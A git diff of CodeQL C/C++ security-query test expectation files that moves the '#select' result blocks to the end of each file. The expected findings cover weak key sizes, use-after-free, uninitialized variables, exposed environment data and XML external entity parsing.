a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected 
@@ -1,10 +1,10 @@ -#select -| test.cpp:34:5:34:38 | call to EVP_PKEY_CTX_set_dsa_paramgen_bits | test.cpp:34:45:34:48 | 1024 | test.cpp:34:45:34:48 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:34:45:34:48 | 1024 | 1024 | -| test.cpp:35:5:35:42 | call to EVP_PKEY_CTX_set_dh_paramgen_prime_len | test.cpp:35:49:35:52 | 1024 | test.cpp:35:49:35:52 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:35:49:35:52 | 1024 | 1024 | -| test.cpp:37:5:37:36 | call to EVP_PKEY_CTX_set_rsa_keygen_bits | test.cpp:37:43:37:46 | 1024 | test.cpp:37:43:37:46 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:37:43:37:46 | 1024 | 1024 | edges nodes | test.cpp:34:45:34:48 | 1024 | semmle.label | 1024 | | test.cpp:35:49:35:52 | 1024 | semmle.label | 1024 | | test.cpp:37:43:37:46 | 1024 | semmle.label | 1024 | subpaths +#select +| test.cpp:34:5:34:38 | call to EVP_PKEY_CTX_set_dsa_paramgen_bits | test.cpp:34:45:34:48 | 1024 | test.cpp:34:45:34:48 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:34:45:34:48 | 1024 | 1024 | +| test.cpp:35:5:35:42 | call to EVP_PKEY_CTX_set_dh_paramgen_prime_len | test.cpp:35:49:35:52 | 1024 | test.cpp:35:49:35:52 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:35:49:35:52 | 1024 | 1024 | +| test.cpp:37:5:37:36 | call to EVP_PKEY_CTX_set_rsa_keygen_bits | test.cpp:37:43:37:46 | 1024 | test.cpp:37:43:37:46 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:37:43:37:46 | 1024 | 1024 | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected index 670caa2291c6..b7decda26517 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected 
@@ -1,18 +1,3 @@ -#select -| test.cpp:41:6:41:9 | data | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | Memory may have been previously freed by $@. | test.cpp:39:2:39:5 | call to free | call to free | -| test.cpp:79:7:79:10 | data | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | Memory may have been previously freed by $@. | test.cpp:75:2:75:5 | call to free | call to free | -| test.cpp:108:6:108:9 | data | test.cpp:106:7:106:10 | pointer to free output argument | test.cpp:108:6:108:9 | data | Memory may have been previously freed by $@. | test.cpp:106:2:106:5 | call to free | call to free | -| test.cpp:119:6:119:9 | data | test.cpp:116:7:116:10 | pointer to free output argument | test.cpp:119:6:119:9 | data | Memory may have been previously freed by $@. | test.cpp:116:2:116:5 | call to free | call to free | -| test.cpp:130:6:130:9 | data | test.cpp:127:7:127:10 | pointer to free output argument | test.cpp:130:6:130:9 | data | Memory may have been previously freed by $@. | test.cpp:127:2:127:5 | call to free | call to free | -| test.cpp:165:2:165:2 | c | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:165:2:165:2 | c | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | -| test.cpp:166:3:166:4 | * ... | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:166:3:166:4 | * ... | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | -| test.cpp:186:6:186:9 | data | test.cpp:181:7:181:10 | pointer to free output argument | test.cpp:186:6:186:9 | data | Memory may have been previously freed by $@. | test.cpp:181:2:181:5 | call to free | call to free | -| test.cpp:197:6:197:9 | data | test.cpp:192:7:192:10 | pointer to free output argument | test.cpp:197:6:197:9 | data | Memory may have been previously freed by $@. 
| test.cpp:192:2:192:5 | call to free | call to free | -| test.cpp:209:6:209:9 | data | test.cpp:203:7:203:10 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:203:2:203:5 | call to free | call to free | -| test.cpp:209:6:209:9 | data | test.cpp:207:8:207:11 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:207:3:207:6 | call to free | call to free | -| test.cpp:217:6:217:6 | x | test.cpp:216:9:216:9 | pointer to operator delete output argument | test.cpp:217:6:217:6 | x | Memory may have been previously freed by $@. | test.cpp:216:2:216:9 | delete | delete | -| test.cpp:248:12:248:15 | data | test.cpp:243:7:243:16 | pointer to free output argument | test.cpp:248:12:248:15 | data | Memory may have been previously freed by $@. | test.cpp:243:2:243:5 | call to free | call to free | -| test.cpp:255:13:255:16 | data | test.cpp:250:7:250:17 | pointer to free output argument | test.cpp:255:13:255:16 | data | Memory may have been previously freed by $@. | test.cpp:250:2:250:5 | call to free | call to free | edges | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | provenance | | | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | provenance | | 
@@ -73,3 +58,18 @@ nodes | test.cpp:255:9:255:10 | *i2 [data] | semmle.label | *i2 [data] | | test.cpp:255:13:255:16 | data | semmle.label | data | subpaths +#select +| test.cpp:41:6:41:9 | data | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | Memory may have been previously freed by $@. | test.cpp:39:2:39:5 | call to free | call to free | +| test.cpp:79:7:79:10 | data | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | Memory may have been previously freed by $@. | test.cpp:75:2:75:5 | call to free | call to free | +| test.cpp:108:6:108:9 | data | test.cpp:106:7:106:10 | pointer to free output argument | test.cpp:108:6:108:9 | data | Memory may have been previously freed by $@. | test.cpp:106:2:106:5 | call to free | call to free | +| test.cpp:119:6:119:9 | data | test.cpp:116:7:116:10 | pointer to free output argument | test.cpp:119:6:119:9 | data | Memory may have been previously freed by $@. | test.cpp:116:2:116:5 | call to free | call to free | +| test.cpp:130:6:130:9 | data | test.cpp:127:7:127:10 | pointer to free output argument | test.cpp:130:6:130:9 | data | Memory may have been previously freed by $@. | test.cpp:127:2:127:5 | call to free | call to free | +| test.cpp:165:2:165:2 | c | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:165:2:165:2 | c | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | +| test.cpp:166:3:166:4 | * ... | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:166:3:166:4 | * ... | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | +| test.cpp:186:6:186:9 | data | test.cpp:181:7:181:10 | pointer to free output argument | test.cpp:186:6:186:9 | data | Memory may have been previously freed by $@. 
| test.cpp:181:2:181:5 | call to free | call to free | +| test.cpp:197:6:197:9 | data | test.cpp:192:7:192:10 | pointer to free output argument | test.cpp:197:6:197:9 | data | Memory may have been previously freed by $@. | test.cpp:192:2:192:5 | call to free | call to free | +| test.cpp:209:6:209:9 | data | test.cpp:203:7:203:10 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:203:2:203:5 | call to free | call to free | +| test.cpp:209:6:209:9 | data | test.cpp:207:8:207:11 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:207:3:207:6 | call to free | call to free | +| test.cpp:217:6:217:6 | x | test.cpp:216:9:216:9 | pointer to operator delete output argument | test.cpp:217:6:217:6 | x | Memory may have been previously freed by $@. | test.cpp:216:2:216:9 | delete | delete | +| test.cpp:248:12:248:15 | data | test.cpp:243:7:243:16 | pointer to free output argument | test.cpp:248:12:248:15 | data | Memory may have been previously freed by $@. | test.cpp:243:2:243:5 | call to free | call to free | +| test.cpp:255:13:255:16 | data | test.cpp:250:7:250:17 | pointer to free output argument | test.cpp:255:13:255:16 | data | Memory may have been previously freed by $@. | test.cpp:250:2:250:5 | call to free | call to free | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected index d35519d860fb..6773f5aef942 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected 
@@ -1,18 +1,3 @@ -#select -| errors.cpp:14:18:14:18 | x | errors.cpp:13:7:13:7 | definition of x | errors.cpp:13:7:13:7 | definition of x | The variable $@ may not be initialized at this access. | errors.cpp:13:7:13:7 | x | x | -| test.cpp:12:6:12:8 | foo | test.cpp:11:6:11:8 | definition of foo | test.cpp:11:6:11:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:11:6:11:8 | foo | foo | -| test.cpp:113:6:113:8 | foo | test.cpp:111:6:111:8 | definition of foo | test.cpp:111:6:111:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:111:6:111:8 | foo | foo | -| test.cpp:227:3:227:3 | x | test.cpp:226:7:226:7 | definition of x | test.cpp:226:7:226:7 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:226:7:226:7 | x | x | -| test.cpp:251:13:251:13 | i | test.cpp:249:6:249:6 | definition of i | test.cpp:249:6:249:6 | definition of i | The variable $@ may not be initialized at this access. | test.cpp:249:6:249:6 | i | i | -| test.cpp:344:10:344:10 | a | test.cpp:341:7:341:7 | definition of a | test.cpp:341:7:341:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:341:7:341:7 | a | a | -| test.cpp:377:10:377:10 | a | test.cpp:366:7:366:7 | definition of a | test.cpp:366:7:366:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:366:7:366:7 | a | a | -| test.cpp:386:9:386:11 | val | test.cpp:367:6:367:8 | definition of val | test.cpp:367:6:367:8 | definition of val | The variable $@ may not be initialized at this access. | test.cpp:367:6:367:8 | val | val | -| test.cpp:425:10:425:10 | j | test.cpp:422:9:422:9 | definition of j | test.cpp:422:9:422:9 | definition of j | The variable $@ may not be initialized at this access. 
| test.cpp:422:9:422:9 | j | j | -| test.cpp:444:9:444:9 | j | test.cpp:439:9:439:9 | definition of j | test.cpp:439:9:439:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:439:9:439:9 | j | j | -| test.cpp:462:2:462:2 | x | test.cpp:460:6:460:6 | definition of x | test.cpp:460:6:460:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:460:6:460:6 | x | x | -| test.cpp:468:7:468:7 | x | test.cpp:466:6:466:6 | definition of x | test.cpp:466:6:466:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:466:6:466:6 | x | x | -| test.cpp:475:2:475:2 | x | test.cpp:472:6:472:6 | definition of x | test.cpp:472:6:472:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:472:6:472:6 | x | x | -| test.cpp:482:7:482:7 | x | test.cpp:479:6:479:6 | definition of x | test.cpp:479:6:479:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:479:6:479:6 | x | x | edges nodes | errors.cpp:13:7:13:7 | definition of x | semmle.label | definition of x | 
@@ -29,3 +14,18 @@ nodes | test.cpp:466:6:466:6 | definition of x | semmle.label | definition of x | | test.cpp:472:6:472:6 | definition of x | semmle.label | definition of x | | test.cpp:479:6:479:6 | definition of x | semmle.label | definition of x | +#select +| errors.cpp:14:18:14:18 | x | errors.cpp:13:7:13:7 | definition of x | errors.cpp:13:7:13:7 | definition of x | The variable $@ may not be initialized at this access. | errors.cpp:13:7:13:7 | x | x | +| test.cpp:12:6:12:8 | foo | test.cpp:11:6:11:8 | definition of foo | test.cpp:11:6:11:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:11:6:11:8 | foo | foo | +| test.cpp:113:6:113:8 | foo | test.cpp:111:6:111:8 | definition of foo | test.cpp:111:6:111:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:111:6:111:8 | foo | foo | +| test.cpp:227:3:227:3 | x | test.cpp:226:7:226:7 | definition of x | test.cpp:226:7:226:7 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:226:7:226:7 | x | x | +| test.cpp:251:13:251:13 | i | test.cpp:249:6:249:6 | definition of i | test.cpp:249:6:249:6 | definition of i | The variable $@ may not be initialized at this access. | test.cpp:249:6:249:6 | i | i | +| test.cpp:344:10:344:10 | a | test.cpp:341:7:341:7 | definition of a | test.cpp:341:7:341:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:341:7:341:7 | a | a | +| test.cpp:377:10:377:10 | a | test.cpp:366:7:366:7 | definition of a | test.cpp:366:7:366:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:366:7:366:7 | a | a | +| test.cpp:386:9:386:11 | val | test.cpp:367:6:367:8 | definition of val | test.cpp:367:6:367:8 | definition of val | The variable $@ may not be initialized at this access. 
| test.cpp:367:6:367:8 | val | val | +| test.cpp:425:10:425:10 | j | test.cpp:422:9:422:9 | definition of j | test.cpp:422:9:422:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:422:9:422:9 | j | j | +| test.cpp:444:9:444:9 | j | test.cpp:439:9:439:9 | definition of j | test.cpp:439:9:439:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:439:9:439:9 | j | j | +| test.cpp:462:2:462:2 | x | test.cpp:460:6:460:6 | definition of x | test.cpp:460:6:460:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:460:6:460:6 | x | x | +| test.cpp:468:7:468:7 | x | test.cpp:466:6:466:6 | definition of x | test.cpp:466:6:466:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:466:6:466:6 | x | x | +| test.cpp:475:2:475:2 | x | test.cpp:472:6:472:6 | definition of x | test.cpp:472:6:472:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:472:6:472:6 | x | x | +| test.cpp:482:7:482:7 | x | test.cpp:479:6:479:6 | definition of x | test.cpp:479:6:479:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:479:6:479:6 | x | x | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected index 62c2ad7896b4..3fc58925ff7b 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected @@ -1,8 +1,8 @@ -#select -| tests.c:70:70:70:77 | *password | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | This operation potentially exposes sensitive system data from $@. | tests.c:57:21:57:28 | *password | *password | edges | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | provenance | | nodes | tests.c:57:21:57:28 | *password | semmle.label | *password | | tests.c:70:70:70:77 | *password | semmle.label | *password | subpaths +#select +| tests.c:70:70:70:77 | *password | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | This operation potentially exposes sensitive system data from $@. | tests.c:57:21:57:28 | *password | *password | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected index e678961de2e8..9756dde70dd3 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected 
@@ -1,21 +1,3 @@ -#select -| tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:48:15:48:36 | *call to getenv | *call to getenv | -| tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:49:15:49:36 | *call to getenv | *call to getenv | -| tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:50:15:50:36 | *call to getenv | *call to getenv | -| tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:57:18:57:39 | *call to getenv | *call to getenv | -| tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:58:41:58:62 | *call to getenv | *call to getenv | -| tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:59:43:59:64 | *call to getenv | *call to getenv | -| tests.cpp:71:27:71:38 | *global_token | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:71:27:71:38 | *global_token | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | -| tests.cpp:73:27:73:31 | *maybe | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:73:27:73:31 | *maybe | This operation potentially exposes sensitive system data from $@. 
| tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | -| tests.cpp:88:15:88:17 | *msg | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:88:15:88:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | -| tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | -| tests.cpp:111:15:111:17 | *tmp | tests.cpp:131:14:131:35 | *call to getenv | tests.cpp:111:15:111:17 | *tmp | This operation potentially exposes sensitive system data from $@. | tests.cpp:131:14:131:35 | *call to getenv | *call to getenv | -| tests.cpp:119:7:119:12 | *buffer | tests.cpp:132:14:132:35 | *call to getenv | tests.cpp:119:7:119:12 | *buffer | This operation potentially exposes sensitive system data from $@. | tests.cpp:132:14:132:35 | *call to getenv | *call to getenv | -| tests.cpp:124:15:124:17 | *msg | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:124:15:124:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | -| tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | -| tests.cpp:141:15:141:20 | *secret | tests.cpp:139:17:139:22 | *call to getenv | tests.cpp:141:15:141:20 | *secret | This operation potentially exposes sensitive system data from $@. | tests.cpp:139:17:139:22 | *call to getenv | *call to getenv | -| tests_passwd.cpp:18:29:18:31 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:18:29:18:31 | *pwd | This operation potentially exposes sensitive system data from $@. 
| tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | -| tests_passwd.cpp:19:26:19:28 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:19:26:19:28 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | edges | tests.cpp:62:7:62:18 | **global_token | tests.cpp:62:7:62:18 | **global_token | provenance | | | tests.cpp:62:7:62:18 | **global_token | tests.cpp:69:2:69:43 | *... = ... | provenance | | 
@@ -73,3 +55,21 @@ nodes | tests_passwd.cpp:18:29:18:31 | *pwd | semmle.label | *pwd | | tests_passwd.cpp:19:26:19:28 | *pwd | semmle.label | *pwd | subpaths +#select +| tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:48:15:48:36 | *call to getenv | *call to getenv | +| tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:49:15:49:36 | *call to getenv | *call to getenv | +| tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:50:15:50:36 | *call to getenv | *call to getenv | +| tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:57:18:57:39 | *call to getenv | *call to getenv | +| tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:58:41:58:62 | *call to getenv | *call to getenv | +| tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:59:43:59:64 | *call to getenv | *call to getenv | +| tests.cpp:71:27:71:38 | *global_token | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:71:27:71:38 | *global_token | This operation potentially exposes sensitive system data from $@. 
| tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | +| tests.cpp:73:27:73:31 | *maybe | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:73:27:73:31 | *maybe | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | +| tests.cpp:88:15:88:17 | *msg | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:88:15:88:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | +| tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | +| tests.cpp:111:15:111:17 | *tmp | tests.cpp:131:14:131:35 | *call to getenv | tests.cpp:111:15:111:17 | *tmp | This operation potentially exposes sensitive system data from $@. | tests.cpp:131:14:131:35 | *call to getenv | *call to getenv | +| tests.cpp:119:7:119:12 | *buffer | tests.cpp:132:14:132:35 | *call to getenv | tests.cpp:119:7:119:12 | *buffer | This operation potentially exposes sensitive system data from $@. | tests.cpp:132:14:132:35 | *call to getenv | *call to getenv | +| tests.cpp:124:15:124:17 | *msg | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:124:15:124:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | +| tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | +| tests.cpp:141:15:141:20 | *secret | tests.cpp:139:17:139:22 | *call to getenv | tests.cpp:141:15:141:20 | *secret | This operation potentially exposes sensitive system data from $@. 
| tests.cpp:139:17:139:22 | *call to getenv | *call to getenv | +| tests_passwd.cpp:18:29:18:31 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:18:29:18:31 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | +| tests_passwd.cpp:19:26:19:28 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:19:26:19:28 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected index 288e811fc737..1376a03ce889 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected 
@@ -1,34 +1,3 @@ -#select -| tests2.cpp:22:2:22:2 | *p | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:22:2:22:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:20:17:20:31 | call to SAXParser | XML parser | -| tests2.cpp:37:2:37:2 | *p | tests2.cpp:33:17:33:31 | call to SAXParser | tests2.cpp:37:2:37:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:33:17:33:31 | call to SAXParser | XML parser | -| tests2.cpp:51:2:51:2 | *p | tests2.cpp:49:12:49:12 | call to SAXParser | tests2.cpp:51:2:51:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:49:12:49:12 | call to SAXParser | XML parser | -| tests3.cpp:25:2:25:2 | *p | tests3.cpp:23:21:23:53 | *call to createXMLReader | tests3.cpp:25:2:25:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:23:21:23:53 | *call to createXMLReader | XML parser | -| tests3.cpp:38:2:38:6 | *p_3_3 | tests3.cpp:35:24:35:56 | *call to createXMLReader | tests3.cpp:38:2:38:6 | *p_3_3 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:35:24:35:56 | *call to createXMLReader | XML parser | -| tests3.cpp:56:2:56:6 | *p_3_5 | tests3.cpp:48:24:48:56 | *call to createXMLReader | tests3.cpp:56:2:56:6 | *p_3_5 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:48:24:48:56 | *call to createXMLReader | XML parser | -| tests3.cpp:63:2:63:2 | *p | tests3.cpp:60:21:60:53 | *call to createXMLReader | tests3.cpp:63:2:63:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:60:21:60:53 | *call to createXMLReader | XML parser | -| tests3.cpp:70:2:70:2 | *p | tests3.cpp:67:21:67:53 | *call to createXMLReader | tests3.cpp:70:2:70:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests3.cpp:67:21:67:53 | *call to createXMLReader | XML parser | -| tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | XML parser | -| tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | XML parser | -| tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:46:34:46:68 | ... \| ... | XML parser | -| tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:77:34:77:38 | flags | XML parser | -| tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | XML parser | -| tests5.cpp:29:2:29:2 | *p | tests5.cpp:27:25:27:38 | *call to createLSParser | tests5.cpp:29:2:29:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:27:25:27:38 | *call to createLSParser | XML parser | -| tests5.cpp:43:2:43:2 | *p | tests5.cpp:40:25:40:38 | *call to createLSParser | tests5.cpp:43:2:43:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
